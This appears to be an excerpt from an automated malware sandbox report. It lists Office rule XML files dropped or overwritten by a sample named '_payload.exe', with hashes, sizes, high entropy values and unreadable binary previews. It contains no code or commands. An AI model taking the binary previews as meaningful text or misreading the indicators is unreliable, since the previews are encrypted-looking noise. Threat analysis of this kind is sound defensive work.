                                                                                                                                                                      Entropy (8bit):7.890701483110215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:VT6T4wQw8APOBgJ0J00ZHJt9rsuzS3xkD:VTsRPOuq02ptRD
                                                                                                                                                                      MD5:FAD0858CB5531613E8C837B428EC5E3C
                                                                                                                                                                      SHA1:568634561B704EAF6E5BE40D5EF786C51BBF4475
                                                                                                                                                                      SHA-256:7F8AB35A99B93D826A7F1EF374E9DC576A49836C2619B52023D39539D4CC4CBA
                                                                                                                                                                      SHA-512:5DD4E14FE6D837FC41C81320FCC25412D24BE9552928C1B794DB8F4E29D94D65A69FC2D4E46BA12522A55B3ECE987657D43B5ECF760F32D5F72B32D420EFFACA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml1.{.e..F...S.....k.1PU.6....A...........G!.........]....Q'.:]^.P.....V.2.+,>...5.d..j.=t:.Ht..k.;....#..2.V...\..R.7..%^u.2.se...&}.EO..Q<....).(..<G.B..B..m.AC.j}..;%@G...?U..)p#Y.U...4.\|..h...{..p0.qLn.\.Wy.f\...n..D`....:...2..p.%.F.rpE.._......2Vp.2.t..}.0.D..b.y.G.X5.O..w....(d......6....`&L....."R.~..g..2.....W."..56k.....:.GUY...[.0.2...X&Ak.5I.U.L.,)....2..pH...s.x.......s0....e.U.kb&/s$....f.b...D.-l.H3kz3..);..k{.)..p......;T..7....2=X........@....V...%.WS.5Y.E.)f...rq ..'./e.sx.5.C.......M.<..].0.u.u9..(.1.ja..1).`......7...q.&.&.....].1u.C..B>.l=.lO.......Qz..~..|p.~U...!...n...ev.B.9.1...b(..z....+z=....C=.7..H.p..(.-AF..auE...oU.M.5.E".....wr..-g1i.3G.eL.@..p.I.E...8.XC.3...3..o....r.9.E....&.../..j...W...'...H.9......t./.X.F.*!A)-"P`8.8......n...Thh.XD....%...7!u.!BO..i.......kS.W.H..V....~P...D.{/.Ti....)C.....r...<..Ta....d.g.G..g.(g.G..?Is..b...w.vq.F.6._N.h.Q..vq...[.,.f.../...?. ..K...@.x..8..E

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700850v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1711
                                                                                                                                                                      Entropy (8bit):7.885187860564031
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:HlQj6G6ho/p5nN883hn6WISW5KxrK/qfp/g6BJ68RtD:HGj96hEjNFW5KhK/8ddnX
                                                                                                                                                                      MD5:F5B6B03CDDBF47B8139835AD6F3C4804
                                                                                                                                                                      SHA1:282158B44087D2EF5E600DE2DCF4C50415E7C69A
                                                                                                                                                                      SHA-256:718646A34F1A16F27EEC1C1694A9ECCEB44841C270BE8F36BC941CBBEF855B22
                                                                                                                                                                      SHA-512:1D63A51C402ACA8BB6D00B637FEFD94393D801F41816522886FF894D3F5DA3A920CE431B1970A7FE0CC04F38EE8691759754D433048B090A53700731E2A5B118
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.~...Np.0D...^..]U.0..E&/.Ry[....../.e..0..nP.u...*P.....R.......@.*J.V....B.$..Ce...*.]....'j...lp[H.....}F.3)......r..%.30H........%.}..N.Pu......G...1.S.GN)..$....>.S..i.-.....P../..M=..xl.C(...s..e.m").j^..uT..z....i@E.&....p.......H.u.vBRa....._#..A..F.L\_...."h.....*as....\..).....+.....nj...b..k.i%....9.xs...#S'Ij...V..q..:.t........$vJE..*QQLnDY...m.S..........+V..t}.9B...N.\.....<..9.x$.D.Pk#0a..K~.6.......{a...*;..do^..'..U.^|......X.7I...`.../...7..z.E.+.......gy^..y9.J.gV...._.^.,.L.1L^.8.[.".-4...z..9C. 3.8J....m....QBo.|{V....F.taSa..Y...[......S....7....U.....t...d*Z~`.9.;.{.......w./...9E...-.y.-..7..Xi.mN..i.|("....r_..1~..{...S..j..5...[.......|.v..?....\Xs.ir...<P..rvN...EC/V|....-....6*e.%E..Z..z....'c...........2....\)S..W.q=.J......j......kF^p.B.o^yU.r.o.u*i..V}...c;.s..y...>..N.`.%@..e..du.D.=.g..F../Riz.......\....x.....p4...........a.p.k>9....`_..1..u.|....H@K...o,0'&..n............... D%....M..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700851v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1748
                                                                                                                                                                      Entropy (8bit):7.884105880600592
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:wG7K4GEMMbprXZBqEBv4KE0GPTEkteJTjCqfD:R7K4VMMbdjqEBktgkteJXCG
                                                                                                                                                                      MD5:8DE16882BC2DA712EC7C9F3BBB6F64F5
                                                                                                                                                                      SHA1:2BD88F59AE67E4EC789804F70A16FF2EF791EF0F
                                                                                                                                                                      SHA-256:8F6C5D50B3A18AD7A4FBFDB55BA0AD805DC8E5BC0CEBB3E03A821081B94F1FDA
                                                                                                                                                                      SHA-512:401A87B77F0DD142C2760970FA8165E5D7FA4EDCFA89425312F8B094F05616530189D397AB7E660BBA87E9A57717F161068E578C6B7C71A0C7FAE73DE8257614
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.s..V..aL...}."...T3#4....m$IrN..0.>EPfgH.O.b5..k....G.x9V..."\..Ht..@YF......U.....\.^.....:. ...^E.#&..JP..f.~.>,....n.t..w...r...85s.P@..6...uK6...e.i..i..O\..Uq.........I..y...#..H.0...'f.g.(0.WC.!6r.t...h...<.%.o.xf.e..(^.m..=2J'.N)..o1..$.L............f.oy.x2..|.zO.EN:..<}........5..~....V.....A....]o....W..C..#..'.w.3..$8.'..$;...!..N.h.J....j..8.._.@...e..#....{.Jx.xt..&.."V.......v...d..Ce_s/...:....^.k.)8p.U..`..?..eB......f...O..tR..b.&....d.*.B9XV..~."$../.b......e!.:v.?Ek..<...{a|.......O...uR..l.9I.h..vB.Y..{.......P..K.K.{..PY........^...k_.dm.s.8.z3.|...J...........o..T....V.Uw.....V<*...^..F.....K...%.T....E.d.,.1;....^,VxV..9..HH.....b.g.`tL].....U.......o.g._j.?.]....$X.<......J..P..oK9w^....Tx4.//UlgMV..uQP+...$.%...t..@._...6l..=...'......1Z.9"....Z.X..0..k._o...XN.........x..F.@.`..3.i..]y..T.........;b..Lyt.lL5.y.!.N.....$W.ih].>.~SX.n............s.e.w"....2.5.........n.....N&.y...u.b....L.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700900v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1704
                                                                                                                                                                      Entropy (8bit):7.882179168289669
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:nTFBCWdr0m2esEiEepqifRV85yOPgeELYcguD:TFBCWymjsEi1hfP85yeiUi
                                                                                                                                                                      MD5:6BDD05229920AAB3A087691BE2DB302C
                                                                                                                                                                      SHA1:35215A599D843137FB48937CCDEAE57A9B1C990D
                                                                                                                                                                      SHA-256:E299F41E9C7072C5601A67C564EC3ED3EB50CBB323C831EF4F7387F5283DB8E3
                                                                                                                                                                      SHA-512:F2F4205B0DE07BB9653066893438970F86862FDC7FA788FE5D3F6BAD7BA17F5DDAB18A41C03E9D3939E131618A59107074D75D8D6CC5A265D3E34717AACE9A91
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml~.f....=%..O..'.....:...X,..K(.a0...V......P)/..$.VM..a.0.q.E\....3)..F...>f.c.7.8.q.y=.h....{_Q.6f.p..V:..o..2....BE.:..U.R.9......c1{JX}....q..8Te.J....L.c...:..#.I...D.s......%;..}....R.."...s...\\..V..K...f...9./#.>....H.i4dv......pD.%.....%. 0......%H...;.M.Qw..%.....vQiv..&................T.nX....|.|^#|...T?d..`\fo........6Z.......m.&..8a..Y..$.{&.M<3.e.R.88M..M.......9Naz.r.R.6v.wk.OI...r.&.p1C.=Q=v*o.....4...<S.$k..M?_.Z.Y....%.a....+R....6..B,.g=..K.F.;.LU._t..0!.>....>.#.{4....n..r..V%..}._.9...hT..R.M...nd.B....~....~B..*T..].fj...._...z....P|4...E....nZ...S.}.\_^...o..k....i..w_....3.t.1.Xs....\8.lk...yS..X....#.*s..;...;.;...%."..^..$......s.4.c..{#.=.....U..#......f|cMZ..".,...^.....;..p....7.......=...d.h...Xd..j...gE.O..87..s?A.ZG.t.6......b.6V.}W]....T......'...|.x...3..-.....}.{..y.0.|.W./v.HC.=.0m. Z5Ky...<.@..<......}...D....B...(oDR.u..Gp.........<..)M!.LA...q.... ./....H(x..4sl..vJ$S..n..T.FcK.#.C.p.c...!

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700901v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1741
                                                                                                                                                                      Entropy (8bit):7.903003386646614
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:jOoqySfbdLX84W2WBNIbDtwzacOzI/OP2D:6nk2bhul5
                                                                                                                                                                      MD5:B55AADC69CDB272637BC194D8E3855C9
                                                                                                                                                                      SHA1:85CFED9EDF7E9DB13240DFB94C1E1421885001CF
                                                                                                                                                                      SHA-256:BA33F4394059B4BF50F7C1645753437C2D3E5D983BF7E5BE5655E376D012B5B5
                                                                                                                                                                      SHA-512:3B1ED91E6936F0DC6341DEE2A2843BE28BFD81B2617C1A42E0343C6678867B2682201F00E8A8A0C0BFFA188ED32E58E898F18E99F929C76C235D9EBB4D39FAE5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml3.j.9..~.@}L..e."d.5e.U.a.T+....!..0k./.]&(...6....P.M.\>.;.c.m.@4M|..G@.*......N0.bR.-..L..'M\...iN.\...0..b..JFQ..K.S.%9..h.k...c_v.y..;.d...*E.....s...D...{T. $.r...g.R.....|.,.{.../..n.*...'._..k..f!-..\.h....6.!wG..U.<4.(k..U...u.y.r..xy.4......B.Z.b....nL2........O.`f.[..*k.E...W.D..'.....#.3....}i.V./`.CY....."=...x... .Z.=...m....h...w...St..^........q.....uK..C$^.(..N...YL.s.......Y........].A..%/.T..y..m?..h....u:...+.......yn.S/....D..Ua.=.v.....5l..:..e$EB...c'.V..].8(.k!/..... VbNlXb=k.AU.l.HK$........B.ka..~.-|B.7rJ.m@l.....-^A-Q3...9$i#. ..W.o....x.E.d9...y.p2.v&...*Q.....l..U.|..LW'8........u.5.....9%n........V.s^.I..7.D@+..IQc+..m..yi..l......@..rl}.....g......zV.V.g.H.c&...O.PI.87.(.%.iP...@..g.gzl..].._.........>.+.C].."...6...%C....r?.5.?.....(&.".P.\S..I.E..k.a<...TT......e...../_..h9....M ........oOv<.....X..%...du.3,...i.....S....X{.%....H.O....5~..OI.....3..%e.6...U:.Y.,(N.g0.@.`...-z.m..#yr......^....k...2Z..U

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700950v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1702
                                                                                                                                                                      Entropy (8bit):7.891275640856921
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:I4J/Q426goibK4KycoyeD2kTvh8A3zIBmrNgD:bdQnfDFxZrTdrG
                                                                                                                                                                      MD5:B74ACFC4C9E7BB42FD69138044D8D7B1
                                                                                                                                                                      SHA1:18B711EE371CAEB00597CC6580285D200299A302
                                                                                                                                                                      SHA-256:0E80CE0AF8E1D43B3E18C52022F40CDA52810E3148AF66C8E094849568BDC254
                                                                                                                                                                      SHA-512:C31B8FD10D37F0EC544E69F4755FCEF2ACACF97ACBFE24B8CA8AE4DDC070CC2C13B9C62C4F261064E7ED78A0419D325FE5455039B8D2745AC72E337357A6E8C6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...`..[..8......$..e........ON..V.`..Y.....8....0.b...G....&....f_.;.......sT..-@dv.{.8<...'..a.4..z.1..8.Q..y..3..iK..._.U..,B..m...2.3R...^.1....&....8/w.ui....*p#...7....7u........Ol..F.$.0C.E.-..?."E..5Yfd.w..X.z.I...5.\.....9..u...h.:.+)..h:..=...!..".......I5n..H#.'.^.9.|i.3qI..n1ZO*./....`.0..7R...<...77.Y....>....;.9... .g.%.S...|.....2....|0.<.;;z.e....%u......^.H<q........g..1..a.....m.*.....e.&.`~2.........s...<*w.2&...Z...r...<.h.....>..~.A0*<.U."`.Et.q...;......Rn.n.....F..$.n.l...I3j\.......R......x?.e....#..s...w9N.6.tK.\....L...'w... ...n....4.Ykz<..8..W...V^...?.....B.@........yO.,.O??.4.a5..........G......t1{w..g*......w....s....mz..s.=......%G.c...G4.`..y....\T......8'.......4q...I...[k...Z0MA[b4..N..N.....}.. .G...*Z...s|.}..-..79|.66.......C.....8..@.1. ......7M.....-........c.%d"`th..t.Vo^q;...<.rv.6...[,.*..~w\+.N.....X.Q.......(eE|}...h.^.......~.Y.S.&!].Ng.8.e..YG...L..).a.L.J.#.@.9,xY...A..J.=.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700951v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1739
                                                                                                                                                                      Entropy (8bit):7.894864540886296
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5LF8b3h4zcB/69v2HYLC/4rbZqshWSveKTMXD:FFK3hg1Xf31vNMT
                                                                                                                                                                      MD5:6A6F76C93B4961984DB27417DD330946
                                                                                                                                                                      SHA1:C1DEB32FA61F1D7D181A1DE53CE5898EE727668F
                                                                                                                                                                      SHA-256:28E75399145C97C287B224D72E04D3DF78CCCE40DF3E900C650437F2450CE6C9
                                                                                                                                                                      SHA-512:151C7D4922429CE03E7B2C1464D0DFE83F31A35DE6DFE7813C015DE4B84D214B32D1B94287A126DA7C5C9DCB394BFBBFAB0273D1ABB68E5AA9B9F0D89DDF88D2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlGt....WJx..y.b..&.<..0!.f.|.3.]z;......1.....xk.m...."i..F.xu..:qs.........-:.0.a..{.u.A.=8.B.8h.;.....Ke.N.$.. B.......!...{VTr.t..aD.,'D..a...J...9.4'(Ij...I,a\D..:.\..=..F..M>..z.>.h?......R`*...:f..?.Y....I..8.)..?.+.{..Z}J'G....3..s.S..p.%.O.t..D...N(% $.r..-..c...tC.A..B^l^.....|..k..U...M].O..%.{........S.O...].....c,..7.M.#tj...=&V..b..7.|..i....lO.k'B#+.ez....!yO}...G.B.....q.@.`&........PMJ...%.......<.....C....,\...uk..<3h.@.......e0..-...^..f;...........7AG..H......(.J...f...Ch....P..l.+..{J...AY.?x...."x./,..R......q.V...!.cV.....FGb@^....;L.../[.b.........|.!.e .2.F....b.m.1..B... ."..n...J.`8.......{i..Y...Z...>b..*.,-(.>..0?.......F>..p...6 ..FS..Wfq.Y.s.6tC....8q... T.q...m2.. %.1...F....!.....].....&r/O..........c....i..\..v...&...:&J...].z$(.|~!.Cr........}..ZT;.Z..!......E'........=...w..`.`... ......,.........&ap...f...^1j.. y...@sS..bC)...uz.p..r.Jw.:..G&X<;...Rz9{n-.ao.P..f.h.;...?|.BRe.0...~..4.w..."

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701050v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1695
                                                                                                                                                                      Entropy (8bit):7.881582766740134
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:IujQxo3/tJSs3wzdLgowfL8B6z3gO4F3IygujXaJ/CAYm0wB1za2bD:IgQStJ1w50oWLVz3X1uulCAEwB1zRD
                                                                                                                                                                      MD5:E99876BF6B66B4B155C89D9B46C622BB
                                                                                                                                                                      SHA1:C80E0295F899FE8E9B8FF9BC67BFEC4FDC946AD7
                                                                                                                                                                      SHA-256:E9EC2312B9E47F7B33318FB5C2224CAFFFBE97B6F377974A54083101D5EDED47
                                                                                                                                                                      SHA-512:522D1547CD97B6208049E72078BF9505ED02F92B110D5B55808DAAE6F68AE6A88EE42A062F7EB9334F2D72C4D8772943EA6E06193E3B8884760967A6D6E74FD2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlb7(..:.?7......C.S6.#...wX.T....7.....d.....+[G.|.D6..2!...o.I.I.O>....E.F.x^.......Gcc="..lK..m.bF..HG'.H.>.ve<....M.Q..`m....B.3Sv..U;...B..=#+T?.Z.....W..v.k/m..\.t@.........g.....,.}dd..[....U*aE.)U.}..*.......cksU..E|.^..;....Oa...su.....Q.LG@..'h...M..c....Zu.z`A...1...0U...P..=Sh.U....n8.(....2.....f.!...2=t=....e6..G....s.2g.D...S.C.I.$.S...s....(.`.r...;^..q...!.>.F....,.[.=......iR..R..5.u.2..#....#.\...~3..Y.! ..@;F..KK.n.P......u...R.g.m.VlW.a.. ..|.Y....r.P..f.)O..QOg...|ed.l.CC.x.+._.G,....E88Y......3.[..N...I.S.........7..Q..?-./x.....R/..7...,w.........LZo......1}E..."...U.qx.,.u.........z..hu._....x....9.V08..&.........H......A3.#.s.x..A...N..|.z...[0.P.r...#P(.E....."...4.6..^.......T;...J...QpR.?.%...s...a..z:........$..Y....P...^^J..$>rfe.c~].........3t..O'3....U.K......n..X<....9..o....Oh... .Q]....h....F,A..M@.....5...).\y.[..[.......4..8{..A4H..8....xAr..D.Cyqd..t@4..6..P..6.p......z.A..h......P

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701051v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1732
                                                                                                                                                                      Entropy (8bit):7.891629704646213
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:CZE966s6pu05PFIp25EIelc3W1lojX4lPA24uOTD:Ci4QgSjB2c3jqo/
                                                                                                                                                                      MD5:236ED7DB74AFAC0F49F1554A241461F4
                                                                                                                                                                      SHA1:254EF64905321D10D7FB9B4A202070DADB4641FD
                                                                                                                                                                      SHA-256:039A2AC6418C9339CDB00F99D6FDE191F8BAB399EB200AB1E6125A3E55D90D45
                                                                                                                                                                      SHA-512:C7C326B80C8F40058397109A78A23163EEE832EDEF93892D043772C54061D839CBEC8AE203FCE405B4FD71193799BC9DF7537FFD4DF1AD07174411128E58EC63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml?....6s.....Eh.v..!...'..i....V...;..H.{~.g9*.x.o...i.q.o.. ...?i8.......^......3Hm..U...J.O[v..gy..\.K.re..U....+O......s^".WOx#yih..``.I,....d.c.\..3..0.b..m.26.c+>FWj....;......s.,....@.3.....>...+.;[..E.....#sHI..^........n....~9.kw...{..7.V..{.T..].WM.g.</.N../.'..b.z........Xey...ZP..&7gd..`.....U.@M3..~.i..-..&...x....I)t.Y..k/.q.9)...r.1...|.Z|......'-.....<.%8~!..IYy..I.....v..9$.\./...uE.....V.p.Q\.E..#.......~....E.../.Z.Fz.yp.......b....T.v.7].e......../........na$..GC..'.....^..P......q.-...Yy...L."......"..-.^._...9..J;..,.B9..V....i..P.B.B....Y@.E.(&.....Y.m....{.....L2.J jN......B1..RAR.?.|..S...|Ih...X..(....}....+(...c.d.X.,qs..dt.uUC.d.j...\....I\!........y..T...........'..;yH.t}.Y.x<..*.#...f....03.R.*!{.@s...7...{B..`mlQLw......u.-r6R....B,&..o.......,.~.u%..gv.|f.,.8b.~.1&.1YB..>.b...P..q..I..t..`....I.2........b.Z..v.....X.>..!B.'....c4{@..j.:....E...=3W.*Df.D.ky.W. .........F..../.x....p/...7..,........\...j.T.o......>.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701100v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1707
                                                                                                                                                                      Entropy (8bit):7.891742528337219
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zT2rg3rLlBGFIsZcQ8oMRFjI0qzx2pVIh6boZzFD:zeoflBsZyoME0qzxoV3sZZ
                                                                                                                                                                      MD5:6BBBEBD9A104A070B5A7AFCA8C6085A7
                                                                                                                                                                      SHA1:56E833C2DD8D3D99AE038093A9AABCAA8FEFC219
                                                                                                                                                                      SHA-256:2C6C562FFB35FF9FCEA44B841AF22CD01DD4850CE61FD02832BD9EC62171A12D
                                                                                                                                                                      SHA-512:0A614E037E6FC0C2407DBADC17340B2A7460D8444B2E03650AB83AF95417209EA04E7908DF7D5A66F12FB6EB239445F54E585A733E7A340A322DF2502316EFA3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlC*.7...}.......k..g-D@'...k.t.L.85.).KvY.>.....R.....3K0.X......V.HN.{.....t...{ROI7..kI..n..T.E8......aQ.;.+.TU.X.c{.aTa....W?B.....X...V...&.VNZ..g.c......'.p..../FZ"{ss.\.....}..25zr:......U.~..ix~.%......xQ...(.....Z...b`C.O`l.VQ.DA(%&....G.xt...c%B.......@s..5..........s..x>..?=(.v*.R..;$.Q..V..t,..OW..:ah.3F{..='....eR.....7..v.E(..6I.!....Z....DE%>*.s.v..u`....^#.iCfL.>......[.".cadu;h...G.B^...u......"KK..&.........R...V..j.L.E..`R...Zg.1....Ht1..Xz..r..TB..V.V.....,.sIu?:....nj+..k.....8FQ..!.w.[..0....2.<.T......|z.%n....nG..n...o...1......Q..W.j.......h..F32...G.*.C}N......#.....B...>a/.@.n2.JL.i.S.b.y.uuu......d7..@... lo-k..jK#.W...N.....y.&79....a...9.(....;.:K..M..m...4,'R..d...$H..ib.B.PC........W!b.P^<4...^:~.w.5..U.[!...UZ.%.e8.1oJ..&.......'.E1....|..z..+7/..BG.a.........>......Ps..Q..;..^.?.@1.XA.@XQY<.9..=..M.._...\.ko...H.8...op..8.\.......Yq.1e.3.Y.rX.{.1{...g..G.".eV..../...4.e3...P-W.Y.`.#6..1+.P.;..dylk.?..7.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701101v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1744
                                                                                                                                                                      Entropy (8bit):7.889362826651537
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:s4nt50YmGpgpLN2ZLFMPVcr7nkLowDw/uvud+BH43DNzLziE/H1mNf8ogaxAC/TP:s4ntWYBpgpwh53XZQu6OhzCWVAUor3D
                                                                                                                                                                      MD5:6E56D796E4E0AE9885204EDB2CE7BE1A
                                                                                                                                                                      SHA1:AABD23489B9323DB41875B9E70D086F16770871C
                                                                                                                                                                      SHA-256:EDC0DA5EC9D2C605637294F8B7484535F85526FE8787DD93A7CF29B7A75BCC1F
                                                                                                                                                                      SHA-512:316873ED8CB9232F9708F9CD7CD3B717A623D96E462105590D1C5532F40C05D96369C34058EB25D8AD4B5CA61FA0B417E5842BEA8AD801C1B295C326F0E5C8E7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml\)..b&K.3Q..Ra.?.2...vW1M;.+...#.0..I..Z.=..g.W. *....Hi..1.;,V-c.X.......N.CaC.4.#......p7<.wyO.NUv...g...F..f...$.j~.+.^.....I..X.d7...WbM.Bi..O...(.(D. .:......,.......B...`.aZw..H\....a.....j.ylg....L...jb._=P..1lL..).#/......G.....}.68#..2.......$.2......2..=...o".e'..2-j.Y...#l*$.o...l.. .]..a.7....4:8.A.@.v....y..x.........z.....%+.0..).Q-.Bp<.......ZbG.......NG+...n?4'....uX.z.P.J...Wi.^B.Q8..t..Gb..^!....J.Z....%.3.U..p_.&L"Ltm......C/>W.'.&us.}.G......["..o.+h..B9...-:...G.y?.[.q.....C...e ........?..X...W..`._.o..[..;3A7J..!i............:..i5Iy..-d}-....%....T...w.W..a...;.]..eO.N-.Q.C..5...D.ns...NI...y.....9~.sq..p=......c..)....<...;[...6....`..R.Pt...m....<#....ka.....t....;\.>K..?./d....,xq;.5>C....|..s...@"...}..T.......|.}.<..vwV_W3u..,`.....P..VP............R.P.fh.q...W.U...b.#....(.=Gu.`.5~C......9..._..uP..E2\|b]Ds.8o...#......B.-.]..V..s.B.H..V..x......u...I.-....$....../I..+..fd....X.....{=U"....v..^.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.883326155734028
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:sGerhjk8SSIDCFN9QaeymiTTaiHniIJmtf2Uy/4872h15K67ypDG+wpz+yuE5haL:DerhjktEN9YMRmcU51rmpDG+3D
                                                                                                                                                                      MD5:CFC4B586DBB504A83CEC392561FB0727
                                                                                                                                                                      SHA1:E2FF2A88F0406C8C77CDDAD4EBC835051A2595CE
                                                                                                                                                                      SHA-256:348B9C9D3AAAF874D69AEBB51A1F6664B9F5F5D107FDFBBAE5013A3A094F2951
                                                                                                                                                                      SHA-512:E5374BF4E07E7EED0302AFB0B8617D191BF42CC36C921BE4E19B3FD82D5FADBA43E9AFD7946DD811E1BDF5BF90C138E9CE0837703AD8191185CFEE0C7457F32F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....Y...d.......Fv.@....&.-.Q.GK%.eIG.z*...<.N(.Mr."..X6..}e.......B.b.....4F.C.c.....\...r.m.........m..!.>.u.FOtJ...........p.o.aD.....(,e%..e.=.h.....pC....t.9..T..."...!2..Jp.V......\#S.lb..j...^p....E&....q..q.$.Q...6p...5.W....._z.3sb....j.CTm..^..E...1..PI.b..c.Ld....I.{.........r.m...y... ..m..y-9.t.-D..~......3...E.D........c"...pE}H....(....0...#5...M..ET*M...jr/...._'g.U?b.<.Z)t.8}.}S.(|.X.NM.N...y.#..&....&d8...]=xA_!.=]+.....*1.bL.HUF.Y.-.....Ng:.Q~3.EQ`4..V;.x....... 0.9.C3.....).....a..~t!b....h<_m._.z.(+..)[...^.(..Z.w0..Fc&...z.]]....*."-..'..C...k.3......{4.....c....*%.}.i...i0e...k.%Ra.....Y......_.A^...Y..8q.$......p,...a,...U.h...>.M.jV....Z....Gi...6...............0...Z.'ZR.o.W.!......cR$DI.."1.N.0.9dt..:..8B..bo.t......Y..e...'wM6?..0.UQoec.."q].=..w.........{.....j.%.&.E..y...x..iK.z...q.&..f......;.Hy...'..?.u..='@C....>...Y....h;xZ.......W...Q..7&.`.Y..:..t-67.U.K..5.EP%s[... .....K............n.l$.R..f....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701151v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.8971291384956
                                                                                                                                                                      Encrypted:false
